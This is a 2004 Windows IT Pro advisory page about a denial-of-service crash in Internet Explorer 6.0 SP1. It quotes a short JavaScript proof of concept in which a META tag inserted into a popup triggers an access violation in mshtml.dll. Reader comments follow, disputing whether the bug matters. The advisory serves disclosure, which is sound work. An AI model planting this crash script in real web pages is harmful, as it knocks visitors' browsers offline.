Windows IT Pro is the leading independent community for IT professionals deploying Microsoft Windows server and client applications and technologies.
  
  
  Advanced Search 


Return to article

Denial of Service in Microsoft Internet Explorer 6.0 SP1
A Web Exclusive from Windows IT Pro
May 21, 2004
Ken Pfeil
Discoveries
InstantDoc #42733
Windows IT Pro
 

Reported May 17, 2004, by Mike Mauler

VERSIONS AFFECTED

  • Microsoft Internet Explorer (IE) 6.0 Service Pack 1 (SP1)

DESCRIPTION
A vulnerability in IE 6.0 SP1 could result in a Denial of Service (DoS) condition. By using a malformed HTML page containing JavaScript code with a specially crafted META tag, a potential attacker could cause IE to terminate with an access violation.

DEMONSTRATION
The discoverer posted the following code as proof of concept:

The following script code will cause Internet Explorer to crash when trying to parse the META tag contained within. The problem stems from a bug in the MSHTML library (mshtml.dll). Below is the script code that causes the crash:

<scr!pt type="text/javascript">
        Wnd = window.createPopup();
        Wnd.document.body.innerHTML='<meta http-equiv="imagetoolbar" content="no">';
</scr!pt>

The effect of the META tag is to cause an access violation within mshtml.dll, however not exploitable. The problematic piece of code is shown below:

636D54AF    8B48 2C         MOV     ECX, [EAX+2C]
EAX = 0, Bad read of address 0x0000002C

VENDOR RESPONSE
Microsoft hasn't released a fix or bulletin that addresses this vulnerability.

CREDIT
Discovered by Mike Mauler.

 



Reader Comments

So we have a script language interpreter/environment in which it's possible to write code that crashes the environment? We have a name for that, but it's not "vulnerability"... it's called "life", get a grip. Meta tags aren't valid in the body, only in the head. The browser imputes the html and body elements in an empty document but it's under no onus to impute a head element. So it choked on bad code? If someone codes a page this way, it's Microsoft's fault that the client's browser crashes? At absolute worst this represents a missed opportunity for judicious null-checking. This does not belong in a security bulliten. Could it be that someone has way too much time on his hands? -Mark

Mark McGinty -May 25, 2004

Where's the DoS? All this VULNERABILITY proves is that bad HTML can crash IE which is no major surprise. You're promoting the equivalent of Chicken Little's "the sky is falling" to read "the universe is imploding!". Why assume that any crash like this can cause a DoS? Stop mixing your careers in journalism with those college semesters of advertising.

J Palmer -May 26, 2004

Am suffering from the effects of this or something very similar HTML corruptionbut not able to correct it....please can anybody suggest a cure.

Richard S -May 27, 2004

ADS BY GOOGLE

Job Openings in IT SPONSORED LINKS FEATURED LINKS
Calculate your savings now
See how SAN is 57% cheaper than DAS over three years

Free CDs Offer Fundamental Content for IT Pros
Are you up to speed on the latest technologies and solutions? Don't miss out on your chance to get up to speed quickly on fundamental, in-depth information on some of the hottest topics in our library of content.

Let Your Users Reset Their Own Passwords: Free Download
Try a 30 day free trial of Desktop Authority Password Self-Service – it provides an easy-to-use, robust system for allowing users to reset their own forgotten passwords or locked accounts.


Exchange Server 2010: Deploying Unified Communications - Virtual conference
December 1, 2009 - Free Registration. Build your Unified Communications future on a strong Exchange Server 2010 foundation.

Get Windows IT Pro & Mark Minasi’s Favorite Power Tools Guide
Order Windows IT Pro now and get "More of Mark Minasi's Favorite Power Tools"--a in-depth guide to the most useful Windows commands --FREE with your paid order! Subscribe today, and save 58% off the cover price!

Migration, Virtualization, Availability, and Desktop Management
Realize the importance of a workload optimization strategy...it can affect your bottom line!

Deep Dive into VMware vSphere, eLearning Series
Join John Savill to explore the major functionality capabilities of the vSphere virtualization platform, including identification of the changes from ESX 3.5.
Windows IT Pro Home Register FAQ for Windows WinInfo News
Europe Edition About Us Contact Us/Customer Service Media Kit Affiliates / Licensing  
SQL Server Magazine Office & SharePoint Pro DevProConnections IT Job Hound
Left-Brain.com Technology Resource Directory asp.netPRO ITTV Windows SuperSite 
 
 Windows IT Pro is a Division of Penton Media Inc.
 © 2009 Penton Media, Inc. Terms of Use | Privacy Statement